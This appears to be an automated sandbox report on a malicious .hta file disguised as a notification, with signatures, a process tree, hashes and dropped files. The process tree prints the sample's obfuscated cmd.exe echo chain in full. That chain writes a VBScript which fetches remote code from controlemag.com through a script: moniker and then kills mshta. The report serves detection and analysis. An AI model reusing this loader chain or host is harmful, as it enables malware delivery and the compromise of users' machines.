Analysis

  • max time kernel
    599s
  • max time network
    362s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    27/09/2024, 05:04

General

  • Target

    ❉ℕ𝕠𝕥𝕚𝕗𝕚𝕔𝕒𝕔𝕚𝕠𝕟❉_①④⑦④①⑤⑥.hta

  • Size

    129B

  • MD5

    c20abedc9a3a53a759b941a231bb0e12

  • SHA1

    41a371a9daebbb51aae8705b638e6cc1d07cc4fe

  • SHA256

    d08c6b3edf9794745d7784c83c2408eb1fcb81fe2d540bbfcfe00bd064705483

  • SHA512

    c8926b11104a1c0802fbf3b960978e4d29bd2acc7585873dc63b9d15da401697015c546c71d08b5142a0c17f26b2ca2a4ca41b08b662d822c8e0de165735bc54

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\❉ℕ𝕠𝕥𝕚𝕗𝕚𝕔𝕒𝕔𝕚𝕠𝕟❉_①④⑦④①⑤⑥.hta"
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2956
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /V/D/c "echo RKKkU68="ri">C:\Users\Public\GmE4.vbs&&echo XPgQJJ61="tp">>C:\Users\Public\GmE4.vbs&&echo MxBHu71=".":bpi5x97="sC" ^& RKKkU68 ^& "pt:ht" ^& XPgQJJ61 ^& "s://">>C:\Users\Public\GmE4.vbs"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2784
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /V/D/c echo|set /p=^"bpi5x97^=bpi5x97 ^& ^"controlemag"+MxBHu71+"com/g1^":GetO^">>C:\Users\Public\\GmE4.vbs&echo|set /p=^"bject(^">>C:\Users\Public\\GmE4.vbs
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2740
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2716
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" set /p="bpi5x97=bpi5x97 & "controlemag"+MxBHu71+"com/g1":GetO" 1>>C:\Users\Public\\GmE4.vbs"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2816
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2920
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" set /p="bject(" 1>>C:\Users\Public\\GmE4.vbs"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2772
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /V/D/c "echo _>>C:\Users\Public\\GmE4.vbs&&echo bpi5x97)>>C:\Users\Public\\GmE4.vbs"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2240
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\\GmE4.vbs
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2760
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\GmE4.vbs"
        3⤵
        • Blocklisted process makes network request
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3004
        • C:\Windows\SysWOW64\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /F /IM mshta.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2028
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
      PID:840
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:2436
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x504
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:660

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\01C4EB257C7039454BDD1C82234DB6BD

            Filesize

            346B

            MD5

            165a8799cab97db9cf3eed8fedb8c4e9

            SHA1

            e76bf8acbb4f765a5942b3f3dfe16aa3d949d9b0

            SHA256

            dbdcc5d407bf3592e1dc7fb265025e9fd57cb9e703c24f557b02b76b405f8a38

            SHA512

            320ce14ea44b9bee627e7d6696994faae41fb519ca4266dc225d63b1250b07736eced5dd094f99605381fb7de15cf046c25a5438f9522ac71857aeffe929f0be

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

            Filesize

            717B

            MD5

            822467b728b7a66b081c91795373789a

            SHA1

            d8f2f02e1eef62485a9feffd59ce837511749865

            SHA256

            af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

            SHA512

            bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\01C4EB257C7039454BDD1C82234DB6BD

            Filesize

            540B

            MD5

            e3ec74d6aeea665044050fa527f1959d

            SHA1

            9411e16b2e11e5e46200d073613f2f7dd70a3384

            SHA256

            0ed0e668e01e49c095ffb4c31de063f6e3bcd5f63674781b17b77cb6daaf93d5

            SHA512

            b78b0e99a08572d75492b82120e25f9bb8f0e098efbe7fa540b518c7027d42e4e809590b56803b9aac7b3bb73ff2f8e01b9ac5a6ee3731c6936a1608ff059b85

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

            Filesize

            192B

            MD5

            10cc2025d12da270a2432153140dc90c

            SHA1

            d8a2da3b8af190798bfbf4b7f5102a0a99e6e03e

            SHA256

            e78855285ffc239b7d546235c549c005c0465bd0f12a9ba19f1e7486456268dc

            SHA512

            0d759a73a8dc311ee9e2f6d6b6e824ce2a42bba99655e934205020c5d15fdbc86a74353505ad7a0e855109778a31dee48bbf16496d575410a151f1ec3493c34b

          • C:\Users\Admin\AppData\Local\Temp\CabCACE.tmp

            Filesize

            70KB

            MD5

            49aebf8cbd62d92ac215b2923fb1b9f5

            SHA1

            1723be06719828dda65ad804298d0431f6aff976

            SHA256

            b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

            SHA512

            bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

          • C:\Users\Public\GmE4.vbs

            Filesize

            95B

            MD5

            07b318c1729c9811c78107921fc8df7c

            SHA1

            da20258f23ba39b7ca2166168645c2dbee83b85c

            SHA256

            e2a0c57dcb3e3e1c911687c3dbcf445852179f807834319a7e390748504408ce

            SHA512

            5600654b0d99408268ec046b54969e1d409e8daef515998c6d6f96525b07e55bb387f02a5796a961cfac6fadf6cbd1a5b0c42d6a0f5ffe9065d112a628b7f745

          • C:\Users\Public\GmE4.vbs

            Filesize

            148B

            MD5

            13d2cb59753385afcebb90503f7c3a8d

            SHA1

            44638250b3a7699884cce274c2d7a3830fb75778

            SHA256

            ee0a89cd8a1e678dc4a108574a74c87a9e7abc424cba25230fd9def05fc3d777

            SHA512

            0222742ebf7fdba78b77cf48a3f50f6b19796b3f2da861f93d140e374d398aca5a3a5249fd163d2a296872734931d9840df7673d9678887e8f5ae21723b076de

          • C:\Users\Public\GmE4.vbs

            Filesize

            157B

            MD5

            5d031af13045840992620b8c59ad0a93

            SHA1

            ffa8da12aea658277ca50548d0a6d93ed9911ec7

            SHA256

            07cbffc6d3bde0e223665256681695d2c5d95a3f13fc25580087d7f301c4581d

            SHA512

            76758b8ceb58cf0af5d36661943cd66351963062a1cc387cd2a51ada5de4a49626f9ddab8cb19350d465779633adccadb443f4c1322b9aae371ea1d04ec185c6

          • C:\Users\Public\GmE4.vbs

            Filesize

            167B

            MD5

            71cdf8f1d1c4626de84d3ae19ae0235b

            SHA1

            8c762e338815a6f37f6eb00630f8d977ce4c092d

            SHA256

            29c1902b4093ad57e36a57cebaaef3265d1bb8fe78bab8c33391aa5133c74e4b

            SHA512

            d77ae5e96ebd3451a1c80743812a00143c2e118301279d3566a8265dbd462332d5513584c1e897bb481dea4576c32bc4ea0ed7430490243cadd62dc9b5bdd024

          • memory/2436-58-0x0000000140000000-0x00000001405E8000-memory.dmp

            Filesize

            5.9MB

          • memory/2436-59-0x0000000140000000-0x00000001405E8000-memory.dmp

            Filesize

            5.9MB

          • memory/2436-60-0x0000000140000000-0x00000001405E8000-memory.dmp

            Filesize

            5.9MB

          • memory/2760-40-0x0000000002550000-0x0000000002650000-memory.dmp

            Filesize

            1024KB